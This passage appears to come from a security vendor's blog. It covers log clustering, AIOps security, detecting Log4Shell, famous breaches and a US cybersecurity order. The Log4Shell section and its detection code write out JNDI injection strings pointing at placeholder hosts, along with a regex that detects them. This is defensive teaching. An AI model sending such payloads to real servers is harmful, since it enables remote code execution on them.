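        groups[template_of(line)].append(line)
    return dict(groups)


def rare_templates(groups, max_share=0.05):
    """(template, count) pairs holding at most max_share of all lines, rarest first."""
    total = sum(len(v) for v in groups.values())
    return sorted(
        ((t, len(v)) for t, v in groups.items() if len(v) / total <= max_share),
        key=lambda pair: pair[1],
    )


def make_sample_lines():
    """Constructed: routine logins and API calls, then a privilege change that occurs once."""
    lines = [f"2021-12-10T12:{i:02d}:00Z auth user {1000 + i} logged in from 198.51.100.{i % 40}"
             for i in range(60)]
    lines += [f"2021-12-10T12:{i:02d}:30Z api GET /api/orders/{500 + i} 200 took {12 + i} ms"
              for i in range(35)]
    lines += [
        "2021-12-10T12:41:07Z auth user 1007 logged in from 203.0.113.77",
        "2021-12-10T12:42:00Z auth user 1007 added to group wheel",
        "2021-12-10T12:42:03Z sudo user 1007 COMMAND=/bin/bash",
    ]
    return lines


if __name__ == "__main__":
    groups = cluster(make_sample_lines())
    print(f"{len(groups)} templates from {sum(len(v) for v in groups.values())} lines")
    for template, count in rare_templates(groups):
        print(count, template, "->", groups[template][0])
```

Ninety-eight lines collapse to four templates, and the two that appear once (a user added to the wheel group, then a root shell via sudo) are exactly the lines an analyst would want surfaced. The limitation of regex masking is that a token the rules don’t recognise (a username, a hostname) splits one template into many; production clustering learns which positions vary from the data instead of from a fixed rule list.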

Inference

Inference is at the heart of what makes advanced machine learning so, well, progressive, and AIOps makes full use of inference algorithms to deliver secure systems.

The ability to infer meaning from discovered patterns allows for highly complex alerts and an unparalleled level of insight from analytics, even in real-time.

‘Inference engines’ operate much like white blood cells. They remember threats, except that instead of storing viral DNA, they remember patterns and anomalous data in the endless noise your AIOps platform parses every second. When suspicious patterns or activity are identified, the platform can raise alerts that contain not only the nature of the threat but a recommended response based on previous events.

And thanks to the broader AIOps and cybersecurity communities, new use cases are implemented into the platform through automated updates. AIOps platforms can infer insight based on attacks that have occurred anywhere, not just within your systems.

Communication

Communication in an AIOps context translates to intuitiveness and ease of use. One key setback of early cybersecurity technologies was their complexity. There is a reason cybersecurity specialists are amongst the highest-paid IT professionals.

AIOps platforms have ease-of-use built-in as a core principle. If an AIOps platform cannot communicate its findings to a human engineer, its objectives have failed. Visualization, natural language summaries, and streamlined alerts and reporting are essential for a successful AIOps platform.

However, communication doesn’t just encompass AI and the human engineers who operate it. As with all modern technologies, AIOps platforms receive regular automated updates and maintenance. This includes other instances of the same platform, creating an “attack one of us, attack all of us” level of defense, which makes the lives of cybercriminals incredibly difficult.

Automation

Last but never least, we have the modern IT operations essential: automation.

We don’t need to explain to you exactly why automation is beneficial by this point. Modern systems are complex and change fast (mainly because of automation, in many cases). Modern security systems need to match this pace.

Automation is how AIOps platforms manage to stay on top of fluid, multidimensional attack surfaces and keep them secure. Every feature of the AIOps platforms we’ve mentioned is fully automated. That’s what makes them so strategically valuable: they allow cybersecurity teams to combat and protect against threats by removing the excessive manual effort needed to find and isolate them.

AIOps cybersecurity use cases

The above explains how AIOps methodology fits into the context of system security. However, this doesn’t give much practical information about adopting AIOps into your cybersecurity strategy. Many organizations are already keeping their systems secure with AIOps platforms. Several use cases perfectly illustrate how AIOps-based security looks on the ground.

Ransomware and malware detection

The Colonial Pipeline attack was perhaps the most notorious use of ransomware in recent years. However, ransomware and malware attacks are still among the most common cybersecurity threats.

It’s estimated that ransomware/malware will cost the US economy $20 billion in 2021. 39% of businesses attacked by ransomware end up paying ransom demands. It’s not a threat that should be taken lightly, even if you believe your business has no data or online assets worth ransoming. AIOps keeps hundreds of companies secure from this common yet incredibly dangerous threat.

The most dangerous ransomware/malware are variants whose signatures are unknown to the broader cybersecurity community (and the systems they update and operate). Automated large-scale event processing, pattern recognition, and ML inference make detecting malware or ransomware much easier, even for new variants.

ML algorithms can pinpoint new malware/ransomware variants based on behavior. In the simplest terms, AIOps platforms can adopt an “if it walks like a duck…” approach. This is much more effective than platforms that simply sweep systems for malicious code matching existing use case libraries.

Fraud detection

Malware and viruses aren’t the only cybersecurity threats faced by modern enterprises. Fraud detection is a crucial feature of your security approach, too. Especially in financial sectors such as banking and insurance, fraud detection has become essential for many IT operations and cybersecurity teams.

AIOps is proving incredibly valuable in this arena. Fraud detection involves a lot of inputs and data types, and all run through intensive processing, including anomaly detection, text mining, database searches, and social network analysis. These all then have to be combined with predictive models so that thorough fraud detection can become effective fraud prevention.

Automating all of this data wrangling has become indispensable for many organizations in the financial sector. Every year fraudulent actors become more advanced in their techniques. The automated and self-learning processes of AIOps platforms provide robust protection against the ever-changing threat landscape of modern fraud.

AIOps is already proving its worth by applying the five dimensions to fraud detection functionality in platforms. This was demonstrated in 2020, when AIOps and ML-supported fraud detection uncovered an extensive and sophisticated phishing scam network targeting Microsoft 365 users.

Endpoint and network behavior modeling

A security platform that can isolate attack indicators isn’t much use after the fact. Unfortunately, creating behavior models for endpoints and networks that preempt system compromising breaches is time-consuming and complex.

This is where AIOps has allowed operations and security teams to make incredible strides. Using Machine Learning and automation-enabled big data parsing and analytics, AIOps platforms can generate complex behavior models. As this is automated and incorporates advanced pattern recognition and inference algorithms, AIOps platform-generated behavior models are not only delivered faster and with significantly less manual input; they’re also, generally speaking, better.

These endpoint and network behavior models can detect much subtler indicators of an attack or a data breach than their manually coded counterparts. This allows your teams to react much faster, isolating suspiciously behaving endpoints or flagged traffic before they become your organization’s latest data breach or cyberattack.

Security event management

As established, a great bulk of your security and operations team’s time can be lost parsing through the endless reams of data your systems generate. Logs and event data mount up fast. To respond effectively, your teams must spot indicators and patterns within vast data sets. The sheer scale of this task, especially in complex modern systems, makes AI-assisted security event management not only sensible in 2021 but almost a requirement.

Simply put, there is so much data noise in modern systems that it’s becoming unreasonable for humans to manage their security manually. AIOps uses machine learning to cut through the data noise and make effective security management a reality again.

AIOps platforms allow for intelligent decision-making and alerting configurations in a way that doesn’t burn out your security and operations staff. It enables them to be everywhere at once, know where they’re needed, and understand what’s required there without countless hours poring through logs and event data.

Threat intelligence analysis

It is threat intelligence that encompasses everything an AIOps platform can achieve for your system security.

AIOps platforms provide a greater level of intelligence, system visibility, and real-time analytics than many other security solutions. Due to the sheer scale of data an AIOps platform can parse and analyze, it provides intuitive insight that gives your operations/security teams a more precise level of threat intelligence than ever before.

Whether it’s identifying impending attacks before data is breached or system-wide security event management that includes cloud-based components, AIOps platforms enable threat intelligence analysis fit for the ever-changing cybersecurity landscape of the 21st century.

Adopting an AIOps security model with the Coralogix platform

We’ve already established that failing to invest in robust security for your systems creates more costs than it saves. If you haven’t recently updated your cybersecurity policies, there has never been a better time. If you’re convinced that the AIOps model is the way forward for your organization, the Coralogix platform is what you need.

Our platform is designed from the ground up to enable organizations to analyze data at the scale needed for a fully AIOps security strategy. Our platform’s machine learning algorithms can analyze more than 100 million logs a day. They’re both powerful and intelligent enough to support pattern discovery as outlined in our AIOps security use cases.

What’s more, our dynamic alerting system uses ML to adjust thresholds responsively to the data processed by the platform. This makes it easier for your security and operations teams to ensure no threat remains undetected and malicious users are detected in record time.

These are just some of the ways our existing users have leveraged the Coralogix platform to keep their systems secure. Get in touch if you’re ready to harness AIOps to increase your system security.

How to Detect Log4Shell Events Using Coralogix

What is Log4Shell?

The Log4J library is one of the most widely used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J framework, also known as Log4Shell, that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.

One of the interesting things about this vulnerability is that it has existed in the code since 2013 and, as far as we know, was not noticed for eight long years.

The way this kind of attack works is straightforward. The attacker needs to know which data in a given application is under their control as a user and will eventually be logged. Using that information, the attacker can send a simple text line like ${jndi:ldap://example.com/file} to that field. When the server sends that string to the logger, the logger will attempt to resolve it by connecting to an LDAP server at the address ‘example.com.’

This will, of course, cause the vulnerable server to use its DNS mechanism to resolve that address first. This allows attackers to “carpet bomb” many fields, like the “User-Agent” and “X-Forwarded-For” headers, with many variations of this string. In many cases, the attacker would use the JNDI string to point the vulnerable server to an LDAP server at an address like <the victim’s domain name>.<the field used to attack>.<a random text used as the attack’s ID>.<attacker controlled domain>.

By doing so, the attacker, who has control over the authoritative DNS server for their domain, can use this server’s logs to build an index of all domain names and IP addresses that are vulnerable to this kind of attack, including which field is the vulnerable one.

More than a single way to detect it

Logs, logs, and more logs

Coralogix, unlike many traditional SIEMs, was not built to hold only “security-related events” (if that is even a thing) but rather to hold any type of textual data. This means that in most cases, it contains all the information and tools that you’ll need to detect security threats without having to do anything special except for creating simple alerting rules.

If you, like many of our customers, are sending your applications’ and servers’ logs to Coralogix, you can simply search for the string “JNDI” in your Internet-facing applications’ logs. If you find something like this, you should take a deeper look:

Coralogix logs

By simply clicking the “fwd” field and selecting “show graph for key,” you’ll see something that looks like this (all the masked items contained IPv4 addresses or comma-separated lists of IP addresses):

Field Visualization

That certainly looks suspicious. If you follow our recommendation to create a NewValue alert that fires for every new value in that field that does not match the expected pattern (a collection of numbers, dots, and commas), Coralogix would have alerted you about the attempt even before the vulnerability was publicly disclosed, and even if the communication to the vulnerable service was encrypted.
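As an added illustration (not code from the Coralogix platform or this post), the following Python scans constructed JSON log records for the ${...jndi...} lookup syntax described above and mimics the NewValue alert on the fwd field, firing once for each previously unseen value that is not a collection of numbers, dots, and commas. The field names (fwd, user_agent, uri), the optional space after a comma, the placeholder callback host and the log records themselves are assumptions.

```python
"""Added example (not Coralogix code): scan web-server log records for
Log4Shell lookup strings and for unexpected values in the forwarded-for field."""
import json
import re
from typing import Dict, Iterable, List

# A JNDI lookup inside Log4j's ${...} substitution syntax, matched
# case-insensitively so that "JNDI" and "jndi" are both caught.
JNDI_LOOKUP = re.compile(r"\$\{[^}]*jndi", re.IGNORECASE)

# Expected shape of an X-Forwarded-For value: IPv4 addresses made of digits and
# dots, comma-separated (a space after the comma is allowed; assumption).
EXPECTED_FWD = re.compile(r"^[0-9.]+(,\s*[0-9.]+)*$")

# Log fields to inspect; the names are assumed, not Coralogix's schema.
WATCHED_FIELDS = ("fwd", "user_agent", "uri")

# Constructed log records (JSON lines) with two lookup attempts and one odd
# forwarded-for value; callback.example is a placeholder host.
SAMPLE_LOG = """\
{"ts": "2021-12-10T10:00:01Z", "fwd": "203.0.113.5", "user_agent": "Mozilla/5.0", "uri": "/login"}
{"ts": "2021-12-10T10:00:02Z", "fwd": "203.0.113.5, 198.51.100.7", "user_agent": "curl/7.68.0", "uri": "/api/items"}
{"ts": "2021-12-10T10:00:03Z", "fwd": "${jndi:ldap://callback.example/a}", "user_agent": "Mozilla/5.0", "uri": "/"}
{"ts": "2021-12-10T10:00:04Z", "fwd": "198.51.100.9", "user_agent": "${JNDI:ldap://callback.example/b}", "uri": "/"}
{"ts": "2021-12-10T10:00:05Z", "fwd": "unknown", "user_agent": "Mozilla/5.0", "uri": "/health"}
{"ts": "2021-12-10T10:00:06Z", "fwd": "unknown", "user_agent": "Mozilla/5.0", "uri": "/health"}
"""


def contains_jndi_lookup(value: str) -> bool:
    """True when the value carries a ${...jndi...} lookup."""
    return bool(JNDI_LOOKUP.search(value))


class NewValueMonitor:
    """Mimics a NewValue alert: fires once for each value of a field that has
    not been seen before and does not match the expected pattern."""

    def __init__(self, expected: "re.Pattern[str]") -> None:
        self.expected = expected
        self.seen: set = set()

    def observe(self, value: str) -> bool:
        if value in self.seen:
            return False
        self.seen.add(value)
        return self.expected.fullmatch(value) is None


def scan_records(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per suspicious field value, in log order."""
    fwd_monitor = NewValueMonitor(EXPECTED_FWD)
    findings: List[Dict[str, str]] = []
    for rec in records:
        flagged = set()
        for field in WATCHED_FIELDS:
            value = rec.get(field, "")
            if contains_jndi_lookup(value):
                findings.append({"field": field, "reason": "jndi lookup", "value": value})
                flagged.add(field)
        fwd = rec.get("fwd")
        # The monitor sees every value so repeats stay quiet; report only when
        # the lookup check has not already flagged the same field.
        if fwd is not None and fwd_monitor.observe(fwd) and "fwd" not in flagged:
            findings.append({"field": "fwd", "reason": "new unexpected value", "value": fwd})
    return findings


def scan_log_text(text: str) -> List[Dict[str, str]]:
    """Parse JSON-lines log text and scan it."""
    records = [json.loads(line) for line in text.splitlines() if line.strip()]
    return scan_records(records)


if __name__ == "__main__":
    for finding in scan_log_text(SAMPLE_LOG):
        print(f"{finding['reason']:>20} in {finding['field']}: {finding['value']}")
```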

Coralogix STA – Passive Mode

With Coralogix STA (Security Traffic Analyzer) installed, you’ll be able to dig even deeper. The STA allows you to analyze the traffic to and from EC2 interfaces and get all the essential information from it as logs in Coralogix. In this case, if the traffic to the server contained an attempt to exploit the Log4Shell vulnerability and it was not encrypted (or if it was encrypted but the STA’s configuration contained the key used to encrypt the traffic), Coralogix will automatically detect that and issue the following alert:

Coralogix Security Traffic Analyzer

Suppose the communication to the vulnerable server is encrypted, and the STA doesn’t have the appropriate key to decipher it. In that case, Suricata won’t be able to detect the JNDI payload in the traffic, and such alerts won’t fire. But even if you don’t send your application logs to Coralogix and the traffic to the Internet-facing service is encrypted, not all is lost.

Coralogix might not be able to detect the attack before it starts, but the Coralogix STA can still detect the attack while it is in progress. As you may have already noticed, the way this vulnerability works is that the attacker will cause the server to contact an external server using the LDAP protocol, which will cause the server to create a DNS request. That DNS request will not be encrypted even if the connection to the server was.

This allows the STA to detect the call to the attacker’s command and control server. Such a call can result from a Log4Shell attack, but the same mechanism detects other types of attacks too.

Because this communication pattern contains a random string (the attack ID), it is most likely to get a relatively low NLP-based score. The queried domain name will be rather long, which will trigger the alert about suspicious domain names (those that are both long and have a low NLP score). In addition to that, the relatively high number of such unique requests will probably trigger a Zeek notice about an increased number of unique queries per parent domain.
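The DNS-side detection just described, as an added example rather than STA or Zeek code: it flags queried names that are both long and contain a random-looking label, and counts unique queries per parent domain the way the Zeek notice does. Shannon entropy of the most random label stands in for the STA’s NLP-based score, the parent domain is taken to be the last two labels, and the thresholds and the log lines (with callback.example as a placeholder attacker domain) are all constructed assumptions.

```python
"""Added example (not Coralogix STA or Zeek code): flag DNS queries that look
like Log4Shell callbacks and parent domains receiving many unique queries."""
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed DNS log excerpt: timestamp, client, queried name. The callback
# names follow the <victim>.<field>.<random id>.<attacker domain> shape
# described in the post; callback.example is a placeholder.
SAMPLE_DNS_LOG = """\
1639130401.10 10.0.0.5 www.example.com
1639130402.20 10.0.0.5 mail.example.com
1639130403.30 10.0.0.5 documentation.internal.tools.corp.example.com
1639130404.40 10.0.0.5 victim.example.fwd.ab3k9x7m2q5z.callback.example
1639130404.50 10.0.0.5 victim.example.useragent.p4w8n6t1r0y3.callback.example
1639130404.60 10.0.0.5 victim.example.fwd.h2j5v9c3f7l1.callback.example
1639130404.70 10.0.0.5 victim.example.referer.g6d1s4k8b2x0.callback.example
1639130404.80 10.0.0.5 victim.example.fwd.e7m3z9q1w5a2.callback.example
1639130404.90 10.0.0.5 victim.example.useragent.n8r2t6y0u4i9.callback.example
1639130405.00 10.0.0.5 victim.example.fwd.ab3k9x7m2q5z.callback.example
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; 0.0 for an empty string."""
    if not text:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def randomness_score(name: str) -> float:
    """Entropy of the most random label. Stands in for the STA's NLP-based
    score (assumption): a high value here corresponds to a low NLP score."""
    return max(shannon_entropy(label) for label in name.split("."))


def parent_domain(name: str) -> str:
    """Last two labels; a real deployment would use a public-suffix list."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def parse_dns_log(text: str) -> List[Tuple[str, str, str]]:
    """Split the constructed log lines into (timestamp, client, name) tuples."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            rows.append((parts[0], parts[1], parts[2].lower()))
    return rows


def analyze_queries(text: str, max_len: int = 40, min_entropy: float = 3.5,
                    max_unique: int = 5) -> Dict[str, object]:
    """Return names that are both long and random-looking, plus parent domains
    that received more than max_unique distinct queries (the Zeek-style notice)."""
    suspicious: List[str] = []
    seen = set()
    per_parent: Dict[str, set] = defaultdict(set)
    for _ts, _client, name in parse_dns_log(text):
        per_parent[parent_domain(name)].add(name)
        if name in seen:
            continue  # a repeated query does not create a repeated finding
        seen.add(name)
        if len(name) > max_len and randomness_score(name) >= min_entropy:
            suspicious.append(name)
    noisy = {p: len(names) for p, names in per_parent.items() if len(names) > max_unique}
    return {"suspicious_names": suspicious, "noisy_parents": noisy}


if __name__ == "__main__":
    result = analyze_queries(SAMPLE_DNS_LOG)
    for name in result["suspicious_names"]:
        print("suspicious:", name)
    for parent, count in result["noisy_parents"].items():
        print(f"notice: {count} unique queries under {parent}")
```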

Coralogix STA – Active Mode

Another option to detect this vulnerability is by deploying Wazuh agents on critical servers and connecting them to the STA. The Wazuh agent will automatically pull the list of all installed software packages on the host and forward it to the STA, which checks that information against the lists of vulnerabilities published by NIST, Red Hat, and Canonical. Wazuh can also be instructed to run an executable and parse its output. By configuring Wazuh to run a tool such as Grype, which analyzes the library dependencies of every piece of software it checks, it is possible to detect vulnerable software even before the first exploit attempt.

Some more logs…

Since outbound connections using the LDAP protocol are usually not allowed in corporate environments, the service will eventually fail to reach the relevant server. This will lead to many exceptions that will be logged as part of the service logs and will most likely cause a flow anomaly alert to fire in Coralogix.

Summary

Coralogix makes it possible to easily detect and investigate Log4Shell cases by either ingesting application, infrastructure, or STA logs. By combining this with an XSOAR integration, it is possible to take actions based on this detection and help prevent the attack from spreading.

What You Can Learn About Cyber Security from the Biggest Breaches in History

It feels like cybersecurity is dominating the newsfeeds, doesn’t it? There is a reason.

Cyberattacks and cybercrime have risen dramatically in the last five years. 2020 broke all records in terms of data loss and the number of cyberattacks. Between 2019 and 2020, ransomware attacks alone rose by 62%, and in the same year the World Economic Forum identified cyberattacks and data theft as two of the biggest risks to the global economy.

Suffice to say, the reason there’s a lot of chatter is that organizations are waking up to what cybersecurity professionals have been saying for years: cybersecurity should always be the top priority.

Cybercriminals in 2021: Hitting harder, faster, and more frequently than ever before.

It’s not just the frequency that’s increased. The scale of attacks continues to grow too. From 2015 to 2020, total revenue lost to cybercrime rose from around 1 billion US dollars to 4.2 billion. Of the 15 biggest data breaches in history, 7 were in the last three years. Cybercrime isn’t a threat that’s going away any time soon.

So, what’s to be done? If you’re one of the many businesses currently reassessing your cybersecurity policy, here’s what you can learn from some of the largest, most notorious, and most damaging cybersecurity incidents in history.


1. Yandex DDoS Attacks (2021)

The first entry on our list is also the most recent. Through August-September of 2021, Russian tech powerhouse Yandex was hit by what’s thought to be the largest DDoS attack ever received.

DDoS attacks (distributed denial-of-service) are one of the oldest tricks in the cybercriminal and hacker handbooks. In a nutshell, attackers disrupt (or shut down) your systems by flooding your network with requests. It’s one of the simplest cybersecurity threats to understand: attackers overload your systems, rendering them inoperable and disrupting your business.

According to Yandex, their servers were hit with almost 22 million requests per second (RPS). Thankfully for Yandex, and rarely for incidents like these, no user data was compromised (that we know of so far). DDoS attacks rarely end well for the businesses at the receiving end.

What DDoS attacks mean for your business

DDoS attacks cost small and medium-sized businesses in excess of $120k on average. For large enterprises, this figure is regularly over $2 million. DDoS attacks are nothing new, but they still account for a staggering amount of cybercrime.

DDoS attacks are targeted. They need to be countered in real-time; they are not something you can rely on your firewall to rebuff. This is why observability platforms are essential tools in any security architecture. Without full visibility and real-time analytics, it’s impossible to counter the waves of requests before they overwhelm your system.

With a modern observability platform, you can safeguard against DDoS activity. Your platform will flag suspicious activity as it happens, allowing you to isolate responsible clients and close connections, shutting off the compromised components or servers before the entire system is driven offline.

2. The Melissa Virus (1999)

The Melissa virus was one of the first large-scale cybersecurity incidents to receive international press coverage.

The trojan malware embedded itself in Microsoft Outlook and spread via email in infected Word documents. From its release in March 1999, Melissa spread until it ended up causing an estimated $80m in damages.

It was the first of a format we’re now all familiar with. Users would receive an email from a known contact. The email would contain a document that, when opened, would embed Melissa onto the new machine (and forward itself to contacts in the new user’s Outlook address book).

Melissa’s activity created so much internal traffic within enterprise-level networks that it took many offline. Those impacted included Microsoft and the United States Marine Corps. It’s difficult to pinpoint the exact number of systems disrupted, but it was a wake-up call during the early years of digital adoption: cybersecurity matters.

What we can learn from the Melissa virus today

Despite the Melissa virus incident happening over 20 years ago, email-spread trojans and malware remain a threat. Raising awareness can only cover so many bases. There are always going to be one or two people who fall for a spam email.

Not to mention that cybercriminals are always growing more sophisticated. Every so often there’ll be a new release that slips through the spam filter. In 2019, Business Email Compromise (BEC) attacks cost US businesses $1.7 billion in losses.

It is possible to safeguard against human error and an evolving threat landscape, however. By setting up Secure Email Gateways (SEGs) and monitoring them in real-time, engineers are alerted to suspicious activity before it lands in the inbox. Catching trojans and malware before they’re embedded in your systems is much easier than removing them once they’re in.

3. Adobe Cyber Attack (2013)

The 2010s saw many high-profile cybersecurity incidents of all kinds. With more of us uploading our personal details to businesses’ data centers than ever, data breaches became a particular focus. The Adobe 2013 breach was one of the largest of the decade.

It’s easy to see why the breach brought Adobe so much negative press. In October 2013 details of over 38 million Adobe users were stolen, and this included almost 3 million credit card numbers. To call it a PR disaster for Adobe would be an understatement.

Adobe ended up receiving a class action lawsuit, which they settled for an undisclosed amount; however, it’s known they faced at least $1.2 million in legal fees alone. The breach led to Adobe completely restructuring its approach to cybersecurity. However, for many affected customers, it was too little, too late.

Why the Adobe breach is so important

The early 2010s were a time of mass migration from on-site infrastructures to the cloud. It was this process that the Adobe hackers exploited. A due-to-be decommissioned backup server was targeted. From here the hackers lifted around 40GB of data.

A key reason the breach was so damning for Adobe was that it could have been avoided. The vulnerable server still existed as part of the system, yet became a blind spot to Adobe’s security architecture. The solution Adobe relied on lacked full system visibility. Hackers had the freedom to operate within the soon-to-be disconnected server completely undetected.

In our landscape of remote servers and as-a-Service cloud platforms, security systems need to have constant observability over all components in your system, even inactive ones. Nothing in your system can be considered isolated, as all of it is reachable by a determined enough hacker.

4. Marriott Hotels Breach (2014-2018)

The Marriott International breach is a lesson in why it’s vital to regularly reassess your cybersecurity. For four years, Marriott’s systems were accessed through an undetected, unprotected back door. How did this happen? Because when Marriott acquired the smaller Starwood Hotels in 2016, they failed to ensure Starwood’s IT infrastructure was up to their own standards.

Fast forward to 2018, and Marriott finds themselves having to report that as many as 339 million guest records have been leaked. While Marriott responded appropriately by reporting the breach to their customers and the relevant UK authorities immediately, failure to adequately secure their systems landed them with an £18.4m fine ($24.8m US).

Marriott made a crucial mistake when they acquired Starwood Hotels. Instead of migrating Starwood’s infrastructure over to their own, they allowed the smaller company to continue using their current (insecure) systems. As soon as these systems were connected to Marriott’s main infrastructure it opened the doors for the hackers already in Starwood’s servers.

The lessons learned from the Marriott Breach

The simple fact of the Marriott breach, and why they received such a hefty fine, is this: the breach could have been avoided. Hackers shouldn’t have been able to operate in the Marriott systems for two years.

The Marriott ecosystem wasn’t unique. Many enterprise IT ecosystems are made of interlinked internal infrastructures of businesses under the company umbrella. If you lack visibility over the other systems of the wider infrastructure your own are never really secure.

With an observability and visibility platform as part of your security solution, breaches such as Marriott’s are safeguarded against. Automated discovery and ML/AI-driven alerting ensure that, when your infrastructure gains a new segment, any suspicious activity or exploited weaknesses are highlighted immediately.

5. Colonial Pipeline Ransomware Attack (2021)

Rounding off our list is perhaps the most widely covered cybersecurity incident of the last decade. In May this year (2021), American oil pipeline and fuel supplier Colonial Pipeline Company was hit with one of the largest scale ransomware attacks in history. The attack targeted computerized equipment, resulting in the entire pipeline halting operations to keep it contained. Not only were the financial damages of this to the US economy astronomical, but Colonial Pipeline also confirmed it paid nearly $5m in ransom.

The group responsible, DarkSide, managed to enter Colonial’s systems by exploiting an unused company VPN account with a compromised password. How this password was acquired is still unknown. The account in question was considered inactive by Colonial’s teams but could still access internal systems (as evidenced by the success of the attack).

How much financial damage occurred from the incident, both to Colonial themselves and the wider US economy, is still being calculated. What took no time to figure out was that even companies as large as Colonial Pipeline, which supports national infrastructure, are vulnerable to cyberattack.

Could the Colonial Pipeline attack have been avoided?

The Colonial Pipeline breach made clear just how far both the private and public sectors still have to go when it comes to cybersecurity. The attack is considered by some to have been the impetus behind Joe Biden’s executive order mandating high-security standards across US government services.

Ultimately yes, the attack could have been avoided. The group responsible gained entry with a single password, and once again remote access was a weak point the hackers were able to exploit. If Colonial had had a more robust and prioritized approach to the security of their systems, the suspicious activity from the previously-offline account would have flagged an alert.

The attack is especially alarming when you consider how much of the US infrastructure relies on Colonial lines. The shortages from the brief switch-off caused average gas prices to rise above $3/gallon for the first time since 2014.

The Three Essential Cyber Security Lessons to Learn from History

The lessons from these examples are obvious. There are common themes that occur throughout, and avoiding these perfect storms of system vulnerability isn’t as difficult as it seems.

Chiefly, it’s important to have a robust security culture throughout your staff. This includes non-IT personnel, too. In almost every example it was a lackluster or short-sighted approach to cybersecurity, be it from those responsible or from staff ignoring warnings about spam, that led to an exploited vulnerability.

The other main lesson is that the technology you rely on needs to be adaptive. It’s not enough to rely on a library of already-known viruses and malware. You need a security system that can self-update and remain on top of the ever-evolving cyber threat ecosystem. Fortunately, many modern platforms can harness AI, machine learning, and cloud capabilities to automate this process, meaning you’re never using yesterday’s security to safeguard against tomorrow’s threats.

Finally, it’s obvious that system-wide monitoring and visibility are key. An observability platform is an essential part of any modern security solution. Many of the above could have been avoided entirely if a robust observability platform was in place. Every blind spot is a vulnerability. It’s clear that any successful security solution will have to remove them at its core. With a modern observability platform such as Coralogix, this is easier than it’s ever been. 

How Biden’s Executive Order on Improving Cybersecurity Will Impact Your Systems

President Joe Biden recently signed an executive order which made adhering to cybersecurity standards a legal requirement for federal departments and agencies.

The move was not a surprise. It comes after a string of high-profile cyber-attacks and data breaches in 2020 and 2021. The frequency and scale of these events exposed a clear culture of lax cybersecurity practices throughout both the public and private sectors.

President Biden’s order brings into law many principles which have long been espoused by cybersecurity advocacy groups, such as the National Institute of Standards and Technology (NIST)’s Five Functions. It is the latest legislation in a trend towards greater transparency and regulation of technology in the US.

The Executive Order on Improving the Nation’s Cybersecurity puts in place safeguards that have until now been lacking or non-existent. While regulations are only legally binding for public organizations (and their suppliers), many see it as a foreshadowing of further regulation and scrutiny of cybersecurity in the private sector.

Although the private sector is not directly impacted, the White House sent a memo to corporate leaders urging them to act as though the regulations are legally binding. It’s clear that businesses must take notice of Biden’s drive to safeguard US national infrastructure against cyber threats.

What’s in the Executive Order on Improving the Nation’s Cyber Security

The order spans almost sections and covers a range of issues, but there are several which stand out as likely to become relevant to the private sector.

Chief of these is a requirement for IT and OT providers who supply government and public bodies to store and curate data in accordance with new regulations. They must also report any potential incidents and cooperate with any government operation to combat a cyber threat.

The order also implies future changes for secure software development, with the private sector encouraged to develop standards and display labels confirming their products’ security and adherence to regulatory standards. Some also theorize that government-only mandates for two-factor authentication, encryption, and cloud security could include private organizations soon.

The key takeaway for businesses is that, whether it’s next year or a decade from now, it’s likely they’ll be required by law to maintain secure systems. If your security, logging, or systems observability are lacking, Biden’s executive order could be your last warning to get them up-to-scratch before regulations become legally binding.

How does this affect my systems?

Many enterprises are acting as though the executive order is legally binding. This is in no small part due to the White House’s memo urging businesses to do so. A common view is that it won’t be long before regulations outlined in the EO are expanded beyond government.

For suppliers to the government, any laws passed following Biden’s order immediately apply. This even extends to IT/OT providers whose own customers include the government. In short, if any part of your system(s) handles government data, you’ll be legally required to secure it according to the regulatory standards.

Data logging and storage regulations

Logging and storage is a key EO focal point. Compliant businesses will have system logs properly collected, maintained, and ready for access should they be required as part of an intelligence or security investigation.

This move is to enhance federal abilities to investigate and remediate threats, and covers both internal network logs and logging data from 3rd party connections. Logs will have to, by law, be available immediately on request. Fortunately, many end-to-end logging platforms make compliance both intuitive and cost-effective.

System visibility requirements

Under the EO, businesses will be required to share system logs and monitoring data when requested. While there aren’t currently legal mandates outlining which data this includes, a thorough and holistic view of your systems will be required during any investigation.

With the order itself stating that “recommendations on requirements for logging events and retaining other relevant data” are soon to come, and shall include “the types of logs to be maintained, the time periods to retain the logs and other relevant data, the time periods for agencies to enable recommended logging and security requirements, and how to protect logs”, it’s clear that future cybersecurity legislation won’t be vague. Compliance requirements, wherever they’re applied, will be specific.

In the near future, businesses found to have critical system visibility blind spots could face significant legal ramifications, especially if those blind spots become an exploited vulnerability in a national cybercrime or cybersecurity incident.

The legal onus will soon be on businesses to ensure their systems don’t contain invisible back doors into the wider national infrastructure. Your observability platform must provide full system visibility.

Secure services

The EO also included suggestions for software and service providers to create a framework for advertising security compliance as a marketable selling point.

While this mainly serves to create a competitive drive to develop secure software, it’s also intended to encourage businesses to be scrupulous about the 3rd parties and software platforms they engage.

In the not-too-distant future, businesses utilizing non-compliant or insecure software or services will likely face legal consequences. Again, the ramifications will be greater should these insecure components be found to have enabled a successful cyberattack. Moving forward, businesses need to apply unprecedented levels of scrutiny to the 3rd party services and software they deploy.

Security should always be the primary concern. While this should have been the case anyway, the legal framework set out by Biden’s executive order means that investing in only the most secure 3rd party tools and platforms could soon be a compliance requirement.

Why now?

The executive order didn’t come out of the blue. In the last couple of years, there have been several high-profile, incredibly damaging cyberattacks on government IT suppliers and critical national infrastructure.

Colonial Pipeline Ransomware Attack

The executive order was undoubtedly prompted by the Colonial Pipeline ransomware attack. On May 7th, 2021, ransomware created by hacker group DarkSide compromised critical systems operated by the Colonial Pipeline Company. The events that followed led to Colonial Pipeline paying $4.4 million in ransom, and the subsequent pipeline shutdown and period of slow operation caused an emergency fuel shortage declaration in 17 states.

SolarWinds Supply Chain Attack

The Colonial Pipeline ransomware attack was just the latest high-impact cybercrime event with a national impact. In December 2020, SolarWinds, an IT supplier with government customers across multiple executive branches and military/intelligence services, compromised its own system security with an exploitable update.

